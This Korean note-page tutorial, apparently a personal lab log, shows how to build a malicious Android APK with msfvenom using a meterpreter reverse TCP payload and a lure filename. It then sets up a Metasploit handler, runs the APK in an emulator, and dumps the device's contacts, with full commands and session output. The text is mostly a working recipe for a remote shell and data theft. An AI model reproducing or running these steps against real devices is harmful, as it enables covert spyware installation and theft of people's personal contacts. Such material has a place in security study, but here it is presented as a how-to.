로그인

# 2 안드로이드 해킹

작성: 2026.08.06 06:45 최근 수정: 2026.08.07 00:47
안드로이드에 악성 프로그램을 만들어서 정보를 빼기 

kali 네트워크는 NAT, 포트포워딩은 4444

칼리에 명령어 쓰고 

┗ msfvenom -p 
┗ android/meterpreter/reverse_tcp LHOST=192.168.0.215 LPORT=4444 -o sexy.apk

프로그램 만들어주기그다음으로 로더 대기  
┗ msfconsole -q 
┗ use exploit/multi/handler
┗ set payload android/meterpreter/reverse_tcp
┗ set LHOST 192.168.0.205
┗ set LPORT 4444
┗ run

대기 여기서 제일 중요한건 프로그램 악성 코드를 만들었다면 공유 폴더 화면으로 빼야한다 <

nox 플레이어 또는 어디서든 꼭 공유 폴더 기준으로 예:) 독수리 라는 폴더 공유에 넣어놓고

┌──(kali㉿kali)-[/media]
└─$ ls
sexy.apk sf_
                                                
┌──(kali㉿kali)-[/media]
└─$ sudo mv sexy.apk sf_/  
                                                
┌──(kali㉿kali)-[/media]
└─$ ls
sf_
                                                
┌──(kali㉿kali)-[/media]
└─$ cd sf_ 
                                                
┌──(kali㉿kali)-[/media/sf_]
└─$ ls
 mail서버로그
 sexy.apk
 레지스트리
 레지스트리로그
 이벤트로그
 포렌식
이런식으로 나올것이다 그럼 녹스에 드래그 끌어다 놓고 < 
apk 만든 악성 페이로더 를 옮기고 실행 시킨다

주소록 연락처 저장하고 빼기 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (72530 bytes) to 192.168.0.215
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 192.168.0.215:61022) at 2026-08-06 02:28:55 -0400

┗ meterpreter > dump_contacts

[*] Fetching 3 contacts into list
[*] Contacts list saved to: contacts_dump_20260806023040.txt

┌──(kali㉿kali)-[~]
└─$┗ cat contacts_dump_20260806023040.txt 

======================
[+] Contacts list dump
======================

Date: 2026-08-06 02:30:40.336443272 -0400
OS: Android 12 - Linux 5.4.40 (x86_64)
Remote IP: 192.168.0.215
Remote Port: 61022

#1
Name : 미스터꺼드럭
Number : 192.168.0.214

#2
Name : 김옥찌
Number : 587785

#3
Name : 빵빵이
Number : 010-1234-5678



이 노트는 로그인하지 않아도 열람할 수 있습니다. 작성·수정·삭제는 관리자 로그인 후 가능합니다.